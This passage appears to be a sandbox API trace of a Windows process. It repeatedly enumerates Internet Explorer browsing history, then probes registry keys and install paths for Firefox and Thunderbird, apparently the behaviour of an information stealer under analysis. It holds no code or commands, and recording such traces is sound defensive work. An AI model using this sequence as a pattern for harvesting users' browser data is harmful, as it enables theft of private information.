[0238.058] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.058] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.058] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.058] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.058] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.058] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.058] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.059] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.059] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.059] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.059] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.059] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.059] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.060] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.060] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.060] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.060] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.060] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.060] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.060] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.061] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.061] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.061] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.061] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.094] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.095] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.095] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.095] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.095] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.095] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.095] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.096] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.096] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.099] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.099] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.099] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.100] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.100] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.100] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.100] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.101] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.101] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.101] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.101] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.101] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.101] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.101] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.102] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.102] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.102] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.102] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.102] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.102] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.102] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.102] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.103] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.122] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.123] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.123] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.123] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.123] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.123] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.123] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.123] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.123] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.124] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.124] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.124] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.124] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.124] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.124] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.124] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.125] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.125] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.125] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.125] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.125] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.125] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.125] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.125] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.126] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.126] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.126] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.126] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.126] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.126] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.126] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.126] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.192] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.192] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.192] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.192] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.192] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.192] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.193] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.193] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.193] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.193] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.193] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.193] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.193] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.193] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.194] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.194] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.194] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.194] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.194] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.194] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.194] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.195] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.195] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.195] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.195] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.195] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.195] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x0) returned 0x1 [0238.196] IUnknown:Release (This=0x717f90) returned 0x0 [0238.199] IUnknown:Release (This=0x716708) returned 0x1 [0238.200] CoUninitialize () [0238.601] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xddb6c, Length=0x800, ResultLength=0xdea24 | out: KeyValueInformation=0xddb6c, ResultLength=0xdea24) returned 0x8000001a [0238.601] NtClose (Handle=0x140) returned 0x0 [0238.638] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x730c020) returned 1 [0238.919] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x7374) returned 0x7388d0 [0238.922] NtCreateKey (in: KeyHandle=0xde988, DesiredAccess=0x20219, ObjectAttributes=0xde800*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Firefox\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde988*=0x0) returned 0xc0000022 [0238.925] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xde538 | out: Value="C:\\Program Files (x86)") returned 0x0 [0238.925] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtPathName=0xde50c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0238.995] NtCreateFile (in: FileHandle=0xde52c, DesiredAccess=0x120089, ObjectAttributes=0xde4f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde514, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde52c*=0x0, IoStatusBlock=0xde514*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0238.998] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x729988) returned 1 [0238.998] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtPathName=0xde50c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0238.998] NtCreateFile (in: FileHandle=0xde52c, DesiredAccess=0x120089, ObjectAttributes=0xde4f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde514, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde52c*=0x0, IoStatusBlock=0xde514*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0238.998] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731b88) returned 1 [0238.999] NtCreateKey (in: KeyHandle=0xde980, DesiredAccess=0x20219, ObjectAttributes=0xde7f8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Thunderbird\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde980*=0x0) returned 0xc0000022 [0238.999] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xde530 | out: Value="C:\\Program Files (x86)") returned 0x0 [0238.999] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtPathName=0xde504, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0238.999] NtCreateFile (in: FileHandle=0xde524, DesiredAccess=0x120089, ObjectAttributes=0xde4ec*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde50c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde524*=0x0, IoStatusBlock=0xde50c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0238.999] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x729898) returned 1 [0238.999] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtPathName=0xde504, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0238.999] NtCreateFile (in: FileHandle=0xde524, 